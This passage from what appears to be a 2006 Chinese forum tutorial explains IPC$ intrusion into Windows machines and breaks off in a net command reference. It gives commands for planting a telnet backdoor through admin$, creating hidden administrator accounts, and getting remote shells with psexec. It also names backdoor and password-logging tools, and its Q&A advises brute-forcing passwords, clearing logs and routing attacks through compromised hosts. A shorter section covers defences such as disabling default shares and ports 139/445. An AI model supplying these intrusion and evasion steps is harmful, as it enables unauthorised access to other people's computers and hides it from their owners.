? [9] ? ? ? ? ? ? C:\>copy ntlm.exe \\127.0.0.1\admin$\system32 ? ? ? ? ? ? \\在原來那個窗口中將ntlm.exe傳過去，ntlm.exe是用來更改telnet身份驗證的　　 ? ? ? ? ? ? [10] ? ? ? ? ? ? C:\WINNT\system32>ntlm.exe ? ? ? ? ? ? \\在shell窗口中運行ntlm.exe，以后你就可以暢通無阻的telnet這臺主機了 ? ? ? ? ? ? 　　 ? ? ? ? ? ? [11] ? ? ? ? ? ? C:\>telnet 127.0.0.1 23 ? ? ? ? ? ? \\在新窗口中telnet到127.0.0.1，端口23可省略，這樣我們又獲得一個長期的后門 ? ? ? ? ? ? [12] ? ? ? ? ? ? C:\WINNT\system32>net user 帳戶名 密碼 /add ? ? ? ? ? ? C:\WINNT\system32>net uesr guest /active:yes ? ? ? ? ? ? C:\WINNT\system32>net localgroup administrators 帳戶名 /add ? ? ? ? ? ? \\telnet上以后，你可以建立新帳戶，激活guest，把任何帳戶加入管理員組等 ? ? [3 樓] | Posted: 2006-05-23 08:14

?

?

不過隨著新工具的出現，上面提到的一些工具和命令現在已經不常用到了，那就讓我們看看現在的高效而簡單的ipc$入侵吧。 ? ? ? ? ? ? [1] ? ? ? ? ? ? p***ec.exe \\IP -u 管理員帳號 -p 密碼 cmd ? ? ? ? ? ? \\用這個工具我們可以一步到位的獲得shell ? ? ? ? ? ? OpenTelnet.exe \\server 管理員帳號 密碼 NTLM的認證方式 port ? ? ? ? ? ? \\用它可以方便的更改telnet的驗證方式和端口，方便我們登陸 ? ? ? ? ? ? [2] ? ? ? ? ? ? 已經沒有第二步了，用一步獲得shell之后，你做什么都可以了，安后門可以用winshell，克隆就用ca吧，開終端用3389.vbe，記錄密碼用win2kpass，總之好的工具不少，隨你選了，我就不多說了。 ? ? ? ? ? ? 十四 如何防范ipc$入侵察看本地共享資源 ? ? ? ? ? ? 運行-cmd-輸入net share ? ? ? ? ? ? 刪除共享(每次輸入一個） ? ? ? ? ? ? net share ipc$ /delete ? ? ? ? ? ? net share admin$ /delete ? ? ? ? ? ? net share c$ /delete ? ? ? ? ? ? net share d$ /delete（如果有e,f,……可以繼續刪除） ? ? ? ? ? ? 1 禁止空連接進行枚舉(此操作并不能阻止空連接的建立) ? ? ? ? ? ? 運行regedit，找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous ? ? ? ? ? ? = DWORD的鍵值改為：1 ? ? ? ? ? ? 如果設置為"1"，一個匿名用戶仍然可以連接到IPC$共享，但無法通過這種連接得到列舉SAM帳號和共享信息的權限；在Windows ? ? ? ? ? ? 2000 ? ? ? ? ? ? 中增加了"2"，未取得匿名權的用戶將不能進行ipc$空連接。建議設置為1。如果上面所說的主鍵不存在，就新建一個再改鍵值。如果你覺得改注冊表麻煩，可以在本地安全設置中設置此項： ? ? ? ? ? ? 在本地安全設置－本地策略－安全選項－＇對匿名連接的額外限制＇ ? ? ? ? ? ? 2 禁止默認共享 ? ? ? ? ? ? 1）察看本地共享資源 ? ? ? ? ? ? 運行-cmd-輸入net share ? ? ? ? ? ? 2）刪除共享（重起后默認共享仍然存在） ? ? ? ? ? ? net share ipc$ /delete ? ? ? ? ? ? net share admin$ /delete ? ? ? ? ? ? net share c$ /delete ? ? ? ? ? ? net share d$ /delete（如果有e,f,……可以繼續刪除） ? ? ? ? ? ? 3）停止server服務 ? ? ? ? ? ? net stop server /y （重新啟動后server服務會重新開啟） ? ? ? ? ? ? 4）禁止自動打開默認共享（此操作并不能關閉ipc$共享） ? ? ? ? ? ? 運行-regedit ? ? ? ? ? ? server版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的鍵值改為:00000000。 ? ? ? ? ? ? pro版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的鍵值改為:00000000。 ? ? ? ? ? ? 這兩個鍵值在默認情況下在主機上是不存在的，需要自己手動添加，修改后重起機器使設置生效。 ? ? ? ? ? ? 3 關閉ipc$和默認共享依賴的服務:server服務 ? ? ? ? ? ? 如果你真的想關閉ipc$共享，那就禁止server服務吧： ? ? ? ? ? ? 控制面板-管理工具-服務-找到server服務（右擊）-屬性-常規-啟動類型-選已禁用，這時可能會有提示說：XXX服務也會關閉是否繼續，因為還有些次要的服務要依賴于server服務，不要管它。 ? ? ? ? ? ? 4 屏蔽139，445端口 ? ? ? ? ? ? 由于沒有以上兩個端口的支持，是無法建立ipc$的，因此屏蔽139，445端口同樣可以阻止ipc$入侵。 ? ? ? ? ? ? 1）139端口可以通過禁止NBT來屏蔽 ? ? ? ? ? ? 本地連接－TCP/IT屬性－高級－WINS－選‘禁用TCP/IT上的NETBIOS’一項 ? ? ? ? ? ? 2）445端口可以通過修改注冊表來屏蔽 ? ? ? ? ? ? 添加一個鍵值 ? ? ? ? ? ? Hive: HKEY_LOCAL_MACHINE ? ? ? ? ? ? Key: System\Controlset\Services\NetBT\Parameters ? ? ? ? ? ? Name: SMBDeviceEnabled ? ? ? ? ? ? Type: REG_DWORD ? ? ? ? ? ? Value: 0 ? ? ? ? ? ? 修改完后重啟機器 ? ? ? ? ? ? 注意：如果屏蔽掉了以上兩個端口，你將無法用ipc$入侵別人。 ? ? ? ? ? ? 3）安裝防火墻進行端口過濾 ? ? ? ? ? ? 6 設置復雜密碼，防止通過ipc$窮舉出密碼，我覺得這才是最好的辦法，增強安全意識，比不停的打補丁要安全的多。 ? ? ? ? ? ? 十五 ipc$入侵問答精選 ? ? ? ? ? ? 1.進行ipc$入侵的時候，會在服務器中留下記錄，有什么辦法可以不讓服務器發現嗎？ ? ? ? ? ? ? 答：留下記錄是一定的，你走后用清除日志程序刪除就可以了，或者用肉雞入侵。 ? ? ? ? ? ? 2.你看下面的情況是為什么，可以連接但不能復制 ? ? ? ? ? ? net use \\***.***.***.***\ipc$ "密碼" /user:"用戶名" ? ? ? ? ? ? 命令成功 ? ? ? ? ? ? copy icmd.exe \\***.***.***.***\admin$ ? ? ? ? ? ? 找不到網絡路徑 ? ? ? ? ? ? 命令不成功 ? ? ? ? ? ? 答：像“找不到網絡路徑”“找不到網絡名”之類的問題，大多是因為你想要復制到的共享文件夾沒有開啟，所以在復制的時候會出現錯誤，你可以試著找找其他的共享文件夾。 ? ? ? ? ? ? 3.如果對方開了IPC$，且能建立空聯接，但打開C、D盤時，都要求密碼，我知道是空連接沒有太多的權限，但沒別的辦法了嗎？ ? ? ? ? ? ? 答：建議先用流光或者別的什么掃描軟件試著猜解一下密碼，如果猜不出來，只能放棄，畢竟空連接的能力有限。 ? ? ? ? ? ? 4.我已經猜解到了管理員的密碼，且已經ipc$連接成功了，但net view \\ip發現它沒開默認共享，我該怎么辦？ ? ? ? ? ? ? 答：首先糾正你的一個錯誤，用net view ? ? ? ? ? ? \\ip是無法看到默認共享的，你可以試著將文件復制到c$，d$看看，如果都不行，說明他關閉了默認共享，那你就用opentelnet.exe或p***ec.exe吧，用法上面有。 ? ? ? ? ? ? 5.ipc$連接成功后，我用下面的命令建立了一個帳戶，卻發現這個帳戶在我自己的機器上，這是怎么回事？ ? ? ? ? ? ? net uset ccbirds /add ? ? ? ? ? ? 答：ipc$建立成功只能說明你與遠程主機建立了通信隧道，并不意味你取得了一個shell，只有在獲得一個shell（比如telnet）之后，你才能在遠程機器建立一個帳戶，否則你的操作只是在本地進行。 ? ? ? ? ? ? 6.我已進入了一臺肉機，用的管理員帳號，可以看他的系統時間，但是復制程序到他的機子上卻不行，每次都提示“拒絕訪問，已復制0個文件”，是不是對方有什么服務沒開，我該怎么辦？ ? ? ? ? ? ? 答：一般來說“拒絕訪問”都是權限不夠的結果，可能是你用的帳戶有問題，還有一種可能，如果你想向普通共享文件夾復制文件卻返回這個錯誤，說明這個文件夾設置的允許訪問用戶中不包括你（哪怕你是管理員），這一點我在上一期文章中分析了。 ? ? ? ? ? ? 7.我用Win98能與對方建立ipc$連接嗎？ ? ? ? ? ? ? 答：理論上不可以，要進行ipc$的操作，建議用win2000，用其他操作系統會帶來許多不必要的麻煩。 ? ? ? ? ? ? 8.我用net use \\ip\ipc$ "" /user ""成功的建立了一個空會話，但用nbtstat -A IP ? ? ? ? ? ? 卻無法導出用戶列表，這是為什么？ ? ? ? ? ? ? 答：空會話在默認的情況下是可以導出用戶列表的，但如果管理員通過修改注冊表來禁止導出列表，就會出現你所說的情況；還有可能是你自己的NBT沒有打開，netstat命令是建立在NBT之上的。　　 ? ? ? ? ? ? 9.我建立ipc$連接的時候返回如下信息：‘提供的憑據與已存在的憑據集沖突’，怎么回事？ ? ? ? ? ? ? 答：呵呵，這說明你已經與目標主機建立了ipc$連接，兩個主機間同時建立兩個ipc$連接是不允許的。 ? ? ? ? ? ? 10.我在映射的時候出現： ? ? ? ? ? ? F:\>net use h: \\211.161.134.*\e$ ? ? ? ? ? ? 系統發生 85 錯誤。 ? ? ? ? ? ? 本地設備名已在使用中。這是怎么回事？ ? ? ? ? ? ? 答：你也太粗心了吧，這說明你有一個h盤了，映射到沒有的盤符吧！ ? ? ? ? ? ? 11.我建立了一個連接f:\>net use \\*.*.*.*\ipc$ "123" /user:"guest" ? ? ? ? ? ? 成功了，但當我映射時出現了錯誤，向我要密碼，怎么回事？ ? ? ? ? ? ? F:\>net use h: \\*.*.*.*\c$ ? ? ? ? ? ? 密碼在 \\*.*.*.*\c$ 無效。 ? ? ? ? ? ? 請鍵入 \\*.*.*.*\c$ 的密碼: ? ? ? ? ? ? 系統發生 5 錯誤。 ? ? ? ? ? ? 拒絕訪問。 ? ? ? ? ? ? 答：呵呵，向你要密碼說明你當前使用的用戶權限不夠，不能映射C$這個默認共享，想辦法提升權限或者找管理員的弱口令吧！默認共享一般是需要管理員權限的。 ? ? ? ? ? ? 12.我用superscan掃到了一個開了139端口的主機，但為什么不能空連接呢？ ? ? ? ? ? ? 答：你混淆了ipc$與139的關系，能進行ipc$連接的主機一定開了139或445端口，但開這兩個端口的主機可不一定能空連接，因為對方可以關閉ipc$共享. ? ? ? ? ? ? 13.我門局域網里的機器大多都是xp，我用流光掃描到幾個administrator帳號口令是空，而且可以連接，但不能復制東西，說錯誤5。請問為什么？ ? ? ? ? ? ? 答：xp的安全性要高一些，在安全策略的默認設置中，對本地帳戶的網絡登錄進行身份驗證的時候，默認為來賓權限，即使你用管理員遠程登錄，也只具有來賓權限，因此你復制文件，當然是錯誤5：權限不夠。 ? ? ? ? ? ? 14.我用net use \\192.168.0.2\ipc$ "password" ? ? ? ? ? ? /user:"administrator" 成功，可是 net use i: \\1 ? ? ? ? ? ? net命令 ? ? ? ? ? ? 許多 Windows NT 網絡命令以 net 開始。這些 net 命令有一些公共屬性： ? ? ? ? ? ? 通過鍵入 net /? 可查閱所有可用的 net 命令。 ? ? ? ? ? ? 通過鍵入 net help 命令可在命令行中獲得 net 命令的語法幫助。例如，要得到 net acco ? ? ? ? ? ? unts 命令的幫助，請鍵入 net help accounts。 ? ? ? ? ? ? 所有 net 命令接受選項 / yes 和 /no（可縮寫為 / y 和 /n ）。/ y 對命令產生的任何交 ? ? ? ? ? ? 互提示自動回答“是”，/n 回答“否”。例如，net stop server 通常提示確認是否根據服 ? ? ? ? ? ? 務器服務結束所有服務，net stop server /y 自動回答“是”并關閉服務器服務。 ? ? ? ? ? ? Net Accounts ? ? ? ? ? ? 更新用戶帳號數據庫、更改密碼及所有帳號的登錄要求。必須要在更改帳號參數的計算機上 ? ? ? ? ? ? 運行網絡登錄服務。 ? ? ? ? ? ? net accounts [/forcelogoff:{minutes │ no}] [/minpwlen:length] ? ? ? ? ? ? [/maxpwage:{days │ ? ? ? ? ? ? unlimited}] [/minpwage:days] [/uniquepw:number] [/domain] ? ? ? ? ? ? net accounts [/sync] [/domain] ? ? ? ? ? ? 參數 ? ? ? ? ? ? 無 ? ? ? ? ? ? 鍵入不帶參數的 net accounts，將顯示當前密碼設置、登錄時限及域信息。 ? ? ? ? ? ? /forcelogoff:{minutes │ no} ? ? ? ? ? ? 設置當用戶帳號或有效登錄時間過期時，結束用戶和服務器會話前的等待時間。no 選項禁止 ? ? ? ? ? ? 強行注銷。該參數的默認設置為 no。 ? ? ? ? ? ? 指定 /forcelogoff:minutes 之后，Windows NT 在其強制用戶退出網絡 minutes 分鐘之前 ? ? ? ? ? ? ，將給用戶發出警報。如果還有打開的文件，Windows NT 將警告用戶。如果 minutes 小于 ? ? ? ? ? ? 兩分鐘，Windows NT 警告用戶立即從網絡注銷。 ? ? ? ? ? ? /minpwlen:length ? ? ? ? ? ? 設置用戶帳號密碼的最少字符數。允許范圍是 0-14，默認值為 6。 ? ? ? ? ? ? /maxpwage:{days │ unlimited} ? ? ? ? ? ? 設置用戶帳號密碼有效的最大天數。unlimited 不設置最大天數。/maxpwage 選項的天數必 ? ? ? ? ? ? 須大于 /minpwage。允許范圍是 1-49,710 天 (unlimited)。默認值為 90 天。 ? ? ? ? ? ? /minpwage:days ? ? ? ? ? ? 設置用戶必須保持原密碼的最小天數。 0 值不設置最小時間。允許范圍是 0-49,710 天，默 ? ? ? ? ? ? 認值為 0 天。 ? ? ? ? ? ? /uniquepw:number ? ? ? ? ? ? 要求用戶更改密碼時，必須在經過 number 次后，才能重復使用與之相同的密碼。允許范圍 ? ? ? ? ? ? 是 0-8。默認值為 5。 ? ? ? ? ? ? /domain ? ? ? ? ? ? 在當前域的主域控制器上執行該操作。否則只在本地計算機執行操作。 ? ? ? ? ? ? 該參數僅用于 Windows NT Server 域中的 Windows NT Workstation ? ? ? ? ? ? 計算機，Windows NT ? ? ? ? ? ? Server 計算機默認為在主域控制器執行操作。 ? ? ? ? ? ? /sync ? ? ? ? ? ? 當用于主域控制器時，該命令使域中所有備份域控制器同步；當用于備份域控制器時，該命 ? ? ? ? ? ? 令僅使該備份域控制器與主域控制器同步。該命令僅適用于 Windows NT Server 域成員的計 ? ? ? ? ? ? 算機。 ? ? ? ? ? ? Net Computer ? ? ? ? ? ? 從域數據庫中添加或刪除計算機。該命令僅在運行 Windows NT Server 的計算機上可用。 ? ? ? ? ? ? net computer \computername {/add │ /del} ? ? ? ? ? ? 參數 ? ? ? ? ? ? \computername ? ? ? ? ? ? 指定要添加到域或從域中刪除的計算機。 ? ? ? ? ? ? /add ? ? ? ? ? ? 將指定計算機添加到域。 ? ? ? ? ? ? /del ? ? ? ? ? ? 將指定計算機從域中刪除。 ? ? ? ? ? ? Net Config ? ? ? ? ? ? 顯示當前運行的可配置服務，或顯示并更改某項服務的設置。 ? ? ? ? ? ? net config [service [options]] ? ? ? ? ? ? 參數 ? ? ? ? ? ? 無 ? ? ? ? ? ? 鍵入不帶參數的 net config 將顯示可配置服務的列表。 ? ? ? ? ? ? service ? ? ? ? ? ? 通過 net config 命令進行配置的服務（server 或 workstation）。 ? ? ? ? ? ? options ? ? ? ? ? ? 服務的特定選項。完整語法請參閱 net config server 或 net config workstation。 ? ? ? ? ? ? Net Config Server ? ? ? ? ? ? 運行服務時顯示或更改服務器的服務設置。 ? ? ? ? ? ? net config server [/autodisconnect:time] [/srvcomment:"text "] ? ? ? ? ? ? [/hidden:{yes │ n ? ? ? ? ? ? o}] ? ? ? ? ? ? 參數 ? ? ? ? ? ? 無 ? ? ? ? ? ? 鍵入不帶參數的 net config server，將顯示服務器服務的當前配置。 ? ? ? ? ? ? /autodisconnect:time ? ? ? ? ? ? 設置斷開前用戶會話閑置的最大時間值。可以指定 -1，表示永不斷開連接。允許范圍是 -1 ? ? ? ? ? ? -65535 分鐘，默認值是 15 分鐘。 ? ? ? ? ? ? /srvcomment:"text " ? ? ? ? ? ? 為服務器添加注釋，可以通過 net view 命令在屏幕上顯示所加注釋。注釋最多可達 48 個 ? ? ? ? ? ? 字符，文字要用引號引住。 ? ? ? ? ? ? /hidden:{yes │ no} ? ? ? ? ? ? 指定服務器的計算機名是否出現在服務器列表中。請注意隱含某個服務器并不改變該服務器 ? ? ? ? ? ? 的權限。默認為 no。 ? ? ? ? ? ? Net Config Workstation ? ? ? ? ? ? 服務運行時，顯示或更改工作站各項服務的設置。 ? ? ? ? ? ? net config workstation [/charcount:bytes] [/chartime:msec] ? ? ? ? ? ? [/charwait:sec] ? ? ? ? ? ? 參數 ? ? ? ? ? ? 無 ? ? ? ? ? ? 鍵入不帶參數的 net config workstation 將顯示本地計算機的當前配置。 ? ? ? ? ? ? /charcount:bytes ? ? ? ? ? ? 指定 Windows NT 在將數據發送到通訊設備之前收集的數據量。如果同時設置 /chartime:m ? ? ? ? ? ? sec 參數，Windows NT 按首先滿足條件的選項運行。允許范圍是 0-65535 字節，默認值是 ? ? ? ? ? ? 16 字節。 ? ? ? ? ? ? /chartime:msec ? ? ? ? ? ? 指定 Windows NT 在將數據發送到通訊設備之前收集數據的時間。如果同時設置 /charcoun ? ? ? ? ? ? t:bytes 參數，Windows NT 按首先滿足條件的選項運行。允許范圍是 0-65535000 毫秒，默 ? ? ? ? ? ? 認值是 250 毫秒。 ? ? ? ? ? ? /charwait:sec ? ? ? ? ? ? 設置 Windows NT 等待通訊設備變為可用的時間。允許的范圍是 0-65535 秒，默認值是 36 ? ? ? ? ? ? 00 秒。 ? ? ? ? ? ? Net Continue ? ? ? ? ? ? 重新激活掛起的服務。 ? ? ? ? ? ? net continue service ? ? ? ? ? ? 參數 ? ? ? ? ? ? service ? ? ? ? ? ? 能夠繼續運行的服務，包括： file server for macintosh（該服務僅限于 Windows NT Se ? ? ? ? ? ? rver）, ftp publishing service, lpdsvc, net logon, network ? ? ? ? ? ? dde，network dde dsdm ? ? ? ? ? ? ，nt lm security support provider，remoteboot（該服務僅限于 Windows NT ? ? ? ? ? ? Server）， ? ? ? ? ? ? remote access server, schedule，server，simple tcp/ip services 及 ? ? ? ? ? ? workstation 。 ? ? ? ? ? ? Net File ? ? ? ? ? ? 顯示某服務器上所有打開的共享文件名及鎖定文件數。該命令也可以關閉個別文件并取消文 ? ? ? ? ? ? 件鎖定。 ? ? ? ? ? ? net file [id [/close]] ? ? ? ? ? ? 參數 ? ? ? ? ? ? 無 ? ? ? ? ? ? 鍵入不帶參數的 net file 可獲得服務器上打開文件的列表。 ? ? ? ? ? ? id ? ? ? ? ? ? 文件標識號。 ? ? ? ? ? ? /close ? ? ? ? ? ? 關閉打開的文件并釋放鎖定記錄。請從共享文件的服務器中鍵入該命令。 ? ? ? ? ? ? Net Group ? ? ? ? ? ? 在 Windows NT Server 域中添加、顯示或更改全局組。該命令僅在 Windows NT Server 域 ? ? ? ? ? ? 中可用。 ? ? ? ? ? ? net group [groupname [/comment:"text "]] [/domain] ? ? ? ? ? ? net group groupname {/add [/comment:"text "] │ /delete} ? ? ? ? ? ? [/domain] ? ? ? ? ? ? net group groupname username [ ...] {/add │ /delete} [/domain] ? ? ? ? ? ? 參數 ? ? ? ? ? ? 無 ? ? ? ? ? ? 鍵入不帶參數的 net group 可以顯示服務器名稱及服務器的組名稱。 ? ? ? ? ? ? groupname ? ? ? ? ? ? 要添加、擴展或刪除的組。僅提供某個組名便可查看組中的用戶列表。 ? ? ? ? ? ? /comment:"text " ? ? ? ? ? ? 為新建組或現有組添加注釋。注釋最多可以是 48 個字符，并用引號將注釋文字引住。 ? ? ? ? ? ? /domain ? ? ? ? ? ? 在當前域的主域控制器中執行該操作，否則在本地計算機上執行操作。 ? ? ? ? ? ? 該參數僅用于作為 Windows NT Server 域成員的 Windows NT Workstation ? ? ? ? ? ? 計算機。Windo ? ? ? ? ? ? ws NT Server 計算機默認為在主域控制器中操作。 ? ? ? ? ? ? username[ ...] ? ? ? ? ? ? 列表顯示要添加到組或從組中刪除的一個或多個用戶。使用空格分隔多個用戶名稱項。 ? ? ? ? ? ? /add ? ? ? ? ? ? 添加組或在組中添加用戶名。必須使用該命令為添加到組中的用戶建立帳號。 ? ? ? ? ? ? /delete ? ? ? ? ? ? 刪除組或從組中刪除用戶名。 ? ? ? ? ? ? Net Help ? ? ? ? ? ? 提供網絡命令列表及幫助主題，或提供指定命令或主題的幫助。可用網絡命令列于 N 下面的 ? ? ? ? ? ? “命令參考”中“命令”窗口內。 ? ? ? ? ? ? net help [command] ? ? ? ? ? ? net command {/help │ /?} ? ? ? ? ? ? 參數 ? ? ? ? ? ? 無 ? ? ? ? ? ? 鍵入不帶參數的 net help 顯示能夠獲得幫助的命令列表和幫助主題。 ? ? ? ? ? ? command ? ? ? ? ? ? 需要其幫助的命令，不要將 net 作為 command 的一部分。 ? ? ? ? ? ? /help ? ? ? ? ? ? 提供顯示幫助文本方式選擇。 ? ? ? ? ? ? /? ? ? ? ? ? ? 顯示命令的正確語法。 ? ? ? ? ? ? Net Helpmsg ? ? ? ? ? ? 提供 Windows NT 錯誤信息的幫助。 ? ? ? ? ? ? net helpmsg message# ? ? ? ? ? ? 參數 ? ? ? ? ? ? message# ? ? ? ? ? ? 需要其幫助的 Windows NT 消息的四位代碼。 ? ? ? ? ? ? Net Localgroup ? ? ? ? ? ? 添加、顯示或更改本地組。 ? ? ? ? ? ? net localgroup [groupname [/comment:"text "]] [/domain] ? ? ? ? ? ? net localgroup groupname {/add [/comment:"text "] │ /delete} ? ? ? ? ? ? [/domain] ? ? ? ? ? ? net localgroup groupname name [ ...] {/add │ /delete} ? ? ? ? ? ? [/domain] ? ? ? ? ? ? 參數 ? ? ? ? ? ? 無 ? ? ? ? ? ? 鍵入不帶參數的 net localgroup 將顯示服務器名稱和計算機的本地組名稱。 ? ? ? ? ? ? groupname ? ? ? ? ? ? 要添加、擴充或刪除的本地組名稱。只提供 groupname 即可查看用戶列表或本地組中的全局 ? ? ? ? ? ? 組。 ? ? ? ? ? ? /comment: "text " ? ? ? ? ? ? 為新建或現有組添加注釋。注釋文字的最大長度是 48 個字符，并用引號引住。 ? ? ? ? ? ? /domain ? ? ? ? ? ? 在當前域的主域控制器中執行操作，否則僅在本地計算機上執行操作。 ? ? ? ? ? ? 該參數僅應用于 Windows NT Server 域中的 Windows NT Workstation ? ? ? ? ? ? 計算機。Windows N ? ? ? ? ? ? T Server 計算機默認為在主域控制器中操作。 ? ? ? ? ? ? name [ ...] ? ? ? ? ? ? 列出要添加到本地組或從本地組中刪除的一個或多個用戶名或組名，多個用戶名或組名之間 ? ? ? ? ? ? 以空格分隔。可以是本地用戶、其他域用戶或全局組，但不能是其他本地組。如果是其他域 ? ? ? ? ? ? 的用戶，要在用戶名前加域名（例如，SALESRALPHR）。 ? ? ? ? ? ? /add ? ? ? ? ? ? 將全局組名或用戶名添加到本地組中。在使用該命令將用戶或全局組添加到本地組之前，必 ? ? ? ? ? ? 須為其建立帳號。 ? ? ? ? ? ? /delete ? ? ? ? ? ? 從本地組中刪除組名或用戶名。 ? ? ? ? ? ? Net Name ? ? ? ? ? ? 添加或刪除消息名（有時也稱別名），或顯示計算機接收消息的名稱列表。要使用 net nam ? ? ? ? ? ? e 命令，計算機中必須運行信使服務。 ? ? ? ? ? ? net name [name [/add │ /delete]] ? ? ? ? ? ? 參數 ? ? ? ? ? ? 無 ? ? ? ? ? ? 鍵入不帶參數的 net name 將列出當前使用的名稱。 ? ? ? ? ? ? name ? ? ? ? ? ? 指定接收消息的名稱。名稱最多為 15 個字符。 ? ? ? ? ? ? /add ? ? ? ? ? ? 將名稱添加到計算機中。 /add 是可選項，鍵入 net name name 與鍵入 net name name /a ? ? ? ? ? ? dd 相同。 ? ? ? ? ? ? /delete ? ? ? ? ? ? 從計算機中刪除名稱。 ? ? ? ? ? ? Net Pause ? ? ? ? ? ? 暫停正在運行的服務。 ? ? ? ? ? ? net pause service ? ? ? ? ? ? 參數 ? ? ? ? ? ? service ? ? ? ? ? ? 指下列服務： file server for macintosh（僅限于 Windows NT Server）、ftp ? ? ? ? ? ? publishi ? ? ? ? ? ? ng service、lpdsvc、net logon、network dde、network dde dsdm、nt lm ? ? ? ? ? ? security sup ? ? ? ? ? ? port provider、remoteboot（僅限于 Windows NT Server）、remote access ? ? ? ? ? ? server、sch ? ? ? ? ? ? edule、server、simple tcp/ip services 或 workstation 。 ? ? ? ? ? ? Net Print ? ? ? ? ? ? 顯示或控制打印作業及打印隊列。 ? ? ? ? ? ? net print \computername sharename ? ? ? ? ? ? net print [\computername ] job# [/hold │ /release │ /delete] ? ? ? ? ? ? 參數 ? ? ? ? ? ? computername ? ? ? ? ? ? 共享打印機隊列的計算機名。 ? ? ? ? ? ? sharename ? ? ? ? ? ? 打印隊列名稱。當包含 computername 與 sharename 時，使用反斜杠 () 將它們分開。 ? ? ? ? ? ? job# ? ? ? ? ? ? 在打印機隊列中分配給打印作業的標識號。有一個或多個打印機隊列的計算機為每個打印作 ? ? ? ? ? ? 業分配唯一標識號。如果某個作業號用于共享打印機隊列中，則不能指定給其他作業，也不 ? ? ? ? ? ? 能分配給其他打印機隊列中的作業。 ? ? ? ? ? ? /hold ? ? ? ? ? ? 使用 job# 時，在打印機隊列中使打印作業等待。打印作業停留在打印機隊列中，并且其他 ? ? ? ? ? ? 打印作業只能等到釋放該作業之后才能進入。 ? ? ? ? ? ? /release ? ? ? ? ? ? 釋放保留的打印作業。 ? ? ? ? ? ? /delete ? ? ? ? ? ? 從打印機隊列中刪除打印作業。 ? ? ? ? ? ? Net Send ? ? ? ? ? ? 向網絡的其他用戶、計算機或通信名發送消息。要接收消息必須運行信使服務。 ? ? ? ? ? ? net send {name │ * │ /domain[:name] │ /users} message ? ? ? ? ? ? 參數 ? ? ? ? ? ? name ? ? ? ? ? ? 要接收發送消息的用戶名、計算機名或通信名。如果計算機名包含空字符，則要將其用引號 ? ? ? ? ? ? (" ") 引住。 ? ? ? ? ? ? * ? ? ? ? ? ? 將消息發送到組中所有名稱。 ? ? ? ? ? ? /domain[:name] ? ? ? ? ? ? 將消息發送到計算機域中的所有名稱。如果指定 name，則消息將發送到指定域或組中的所有 ? ? ? ? ? ? 名稱。 ? ? ? ? ? ? /users ? ? ? ? ? ? 將消息發送到與服務器連接的所有用戶。 ? ? ? ? ? ? message ? ? ? ? ? ? 作為消息發送的文本。 ? ? ? ? ? ? Net Session ? ? ? ? ? ? 列出或斷開本地計算機和與之連接的客戶端的會話。 ? ? ? ? ? ? net session [\computername] [/delete] ? ? ? ? ? ? 參數 ? ? ? ? ? ? 無 ? ? ? ? ? ? 鍵入不帶參數的 net session 可以顯示所有與本地計算機的會話的信息。 ? ? ? ? ? ? \computername ? ? ? ? ? ? 標識要列出或斷開會話的計算機。 ? ? ? ? ? ? /delete ? ? ? ? ? ? 結束與 \computername 計算機會話并關閉本次會話期間計算機的所有打開文件。如果省略 ? ? ? ? ? ? \computername 參數，將取消與本地計算機的所有會話。 ? ? ? ? ? ? Net Share ? ? ? ? ? ? 創建、刪除或顯示共享資源。 ? ? ? ? ? ? net share sharename ? ? ? ? ? ? net share sharename=drive:path [/users:number │ /unlimited] ? ? ? ? ? ? [/remark:"text"] ? ? ? ? ? ? net share sharename [/users:number │ unlimited] ? ? ? ? ? ? [/remark:"text"] ? ? ? ? ? ? net share {sharename │ drive:path} /delete ? ? ? ? ? ? 參數 ? ? ? ? ? ? 無 ? ? ? ? ? ? 鍵入不帶參數的 net share 將顯示本地計算機上所有共享資源的信息。 ? ? ? ? ? ? sharename ? ? ? ? ? ? 是共享資源的網絡名稱。鍵入帶 sharename 的 net share 命令，只顯示該共享信息。 ? ? ? ? ? ? drive:path ? ? ? ? ? ? 指定共享目錄的絕對路徑。 ? ? ? ? ? ? /users:number ? ? ? ? ? ? 設置可同時訪問共享資源的最大用戶數。 ? ? ? ? ? ? /unlimited ? ? ? ? ? ? 不限制同時訪問共享資源的用戶數。 ? ? ? ? ? ? /remark:"text " ? ? ? ? ? ? 添加關于資源的注釋，注釋文字用引號引住。 ? ? ? ? ? ? /delete ? ? ? ? ? ? 停止共享資源。 ? ? ? ? ? ? Net Start ? ? ? ? ? ? 啟動服務，或顯示已啟動服務的列表。如果服務名是兩個或兩個以上的詞，如 Net Logon 或 ? ? ? ? ? ? Computer Browser，則必須用引號 (") 引住。. ? ? ? ? ? ? net start [service] ? ? ? ? ? ? 參數 ? ? ? ? ? ? 無 ? ? ? ? ? ? 鍵入不帶參數的 net start 則顯示運行服務的列表。 ? ? ? ? ? ? service ? ? ? ? ? ? 包括下列服務： alerter、client service for netware、clipbook ? ? ? ? ? ? server、computer br ? ? ? ? ? ? owser、dhcp client 、directory replicator 、eventlog 、ftp ? ? ? ? ? ? publishing service 、 ? ? ? ? ? ? lpdsvc、messenger 、net logon 、network dde 、network dde dsdm ? ? ? ? ? ? 、network monitor ? ? ? ? ? ? ing agent 、nt lm security support provider 、ole 、remote access ? ? ? ? ? ? connection man ? ? ? ? ? ? ager 、remote access isnsap service 、remote access server ? ? ? ? ? ? 、remote procedure ca ? ? ? ? ? ? ll (rpc) locator 、remote procedure call (rpc) service ? ? ? ? ? ? 、schedule 、server 、sim ? ? ? ? ? ? ple tcp/ip services 、snmp、spooler 、tcp/ip netbios helper 、ups ? ? ? ? ? ? 及 workstation ? ? ? ? ? ? 。 ? ? ? ? ? ? 下列服務僅在 Windows NT Server 下可用：file server for macintosh、gateway ? ? ? ? ? ? servic ? ? ? ? ? ? e for netware、microsoft dhcp server、print server for ? ? ? ? ? ? macintosh、remoteboot、wi ? ? ? ? ? ? ndows internet name service 。 ? ? ? ? ? ? Net Statistics ? ? ? ? ? ? 顯示本地工作站或服務器服務的統計記錄。 ? ? ? ? ? ? net statistics [workstation │ server] ? ? ? ? ? ? 參數 ? ? ? ? ? ? 無 ? ? ? ? ? ? 鍵入不帶參數的 net statistics 將列出其統計信息可用的運行服務。 ? ? ? ? ? ? workstation ? ? ? ? ? ? 